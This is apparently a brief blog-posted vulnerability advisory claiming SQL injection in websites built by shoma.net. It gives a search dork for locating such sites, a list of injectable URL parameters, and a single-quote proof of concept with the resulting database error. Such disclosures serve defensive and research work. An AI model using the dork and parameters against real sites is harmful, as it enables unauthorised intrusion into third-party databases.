Title : shoma.net Web Design Vulnerable to Multiple SQL Injection
Website : http://www.shoma.net/
Dork : Developed by Shoma.net
Type : WebApps
http://localhost.com/SubNews.cfm?NewsID=[SQL]
http://localhost.com/details.cfm?TourID=[SQL]&categoryId=[SQL]
http://localhost.com/Hotellist.cfm?starID=[SQL]
http://localhost.com/index_show.asp?idbasic=[SQL]
http://localhost.com/index_view.asp?idrecipie=[SQL]
There are more parameters need to be checked.
#####
#POC#
#####
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
http://127.0.0.1/Subnews.cfm?newsid=1'
Error Executing Database Query.
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsId=1'''.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- p0pc0rn -
0 comments:
Post a Comment